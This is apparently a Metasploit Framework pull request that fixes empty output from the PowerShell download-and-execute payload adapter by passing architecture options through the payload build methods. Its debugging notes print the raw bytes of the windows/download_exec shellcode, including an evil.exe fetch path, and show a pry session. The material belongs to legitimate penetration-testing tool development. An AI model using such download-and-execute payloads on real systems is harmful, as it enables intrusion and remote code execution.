### PR TITLE
Fix empty cmd/windows/powershell/download_exec payload

### DIFF
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -288,9 +288,9 @@ class Payload < Msf::Module
 
   #
   # Generates the payload and returns the raw buffer to the caller.
-  #
-  def generate(_opts = {})
-    internal_generate
+  # @param opts [Hash]
+  def generate(opts = {})
+    internal_generate(opts)
   end
 
   #
@@ -611,9 +611,10 @@ protected
   #
   # @see PayloadSet#check_blob_cache
   # @param asm [String] Assembly code to be assembled into a raw payload
+  # @param opts [Hash]
   # @return [String] The final, assembled payload
   # @raise ArgumentError if +asm+ is blank
-  def build(asm, off={})
+  def build(asm, off={}, opts = {})
     if(asm.nil? or asm.empty?)
       raise ArgumentError, "Assembly must not be empty"
     end
@@ -644,7 +645,7 @@ protected
     end
 
     # Assemble the payload from the assembly
-    a = self.arch
+    a = opts[:arch] || self.arch
     if a.kind_of? Array
       a = self.arch.first
     end
@@ -677,11 +678,11 @@ protected
   #
   # Generate the payload using our local payload blob and offsets
   #
-  def internal_generate
+  def internal_generate(opts = {})
     # Build the payload, either by using the raw payload blob defined in the
     # module or by actually assembling it
     if assembly and !assembly.empty?
-      raw = build(assembly, offsets)
+      raw = build(assembly, offsets, opts)
     else
       raw = payload.dup
     end


### PR DESCRIPTION
Fix a bug in `cmd/windows/powershell/download_exec` which caused empty payloads to be generated

Closes https://github.com/rapid7/metasploit-framework/issues/18607

## Debugging Notes

Adding this debug line:

```
diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb
index 0a7295d6ef..a28fb2ea9d 100644
--- a/modules/payloads/singles/windows/download_exec.rb
+++ b/modules/payloads/singles/windows/download_exec.rb
@@ -386,6 +386,8 @@ server_host:
 end:
 EOS
     self.assembly = payload_data
-    super
+    result = super
+    $stderr.puts "Generated: #{result}"
+    result
   end
 end
```

Shows the unadapted payload works:

```
msf6 payload(windows/download_exec) > generate -f raw
Generated: ??`??1?d?R0?R
?8?u?}?;}$u?X?X$?f??H?X ??<I?4??1?1????|, ??
                   K?XӋ?ЉD$$[[aYZQ??X_Z??]hnethwini??ThLw&??1?WWWWVh:Vy????c[1?QQjQQh?SPhW??????OY1?Rh2??RRRQRPh?U.;?Չ?j[h?3??jPjVhuF????1?WWWWVh-{?Յ?uK?z???????/evil.exe?k1?_PjjPjjWh???O?Փ1?f?)?T?L1??PQVh????Յ?t-X??tjTP?D$
                                                                 PSh-W?[?Ճ???ShƖ?R??jWh1?o???jh?V??????rund11.exe????localhost
??`??1?d?R0?R
?8?u?}?;}$u?X?X$?f??H?X ??<I?4??1?1????
                   K?XӋ?ЉD$$[[aYZQ??X_Z??]hnethwini??ThLw&??1?WWWWVh:Vy????c[1?QQjQQh?SPhW??????OY1?Rh2??RRRQRPh?U.;?Չ?j[h?3??jPjVhuF????1?WWWWVh-{?Յ?uK?z???????/evil.exe?k1?_PjjPjjWh???O?Փ1?f?)?T?L1??PQVh????Յ?t-X??tjTP?D$
                                                                 PSh-W?[?Ճ???ShƖ?R??jWh1?o???jh?V??????rund11.exe????localhost
```

But the adapter doesn't:

```
msf6 payload(cmd/windows/powershell/download_exec) > generate -f raw
Generated: 
```

This is because the adapted payload arch is identified as `["cmd"]`, so it doesn't convert the ASM payload correctly:

```
[9] pry(#<#<Class:0x00007fe1cfc73928>>)> whereami

From: /Users/user/Documents/code/metasploit-framework/lib/msf/core/payload.rb:652 Msf::Payload#build:

    647:     # Assemble the payload from the assembly
    648:     a = self.arch
    649:     if a.kind_of? Array
    650:       a = self.arch.first
    651:     end
 => 652:     cpu = case a
    653:       when ARCH_X86    then Metasm::Ia32.new
    654:       when ARCH_X64    then Metasm::X86_64.new
    655:       when ARCH_PPC    then Metasm::PowerPC.new
    656:       when ARCH_ARMLE  then Metasm::ARM.new
    657:       when ARCH_MIPSLE then Metasm::MIPS.new(:little)
    658:       when ARCH_MIPSBE then Metasm::MIPS.new(:big)
    659:       else
    660:         elog("Broken payload #{refname} has arch unsupported with assembly: #{module_info["Arch"].inspect}")
    661:         elog("Call stack:\n#{caller.join("\n")}")
    662:         return ""
    663:       end
    664:     sc = Metasm::Shellcode.assemble(cpu, asm).encoded

[10] pry(#<#<Class:0x00007fe1cfc73928>>)> self.arch
=> ["cmd"]
```

## Verification

Verify that the steps in https://github.com/rapid7/metasploit-framework/issues/18607 work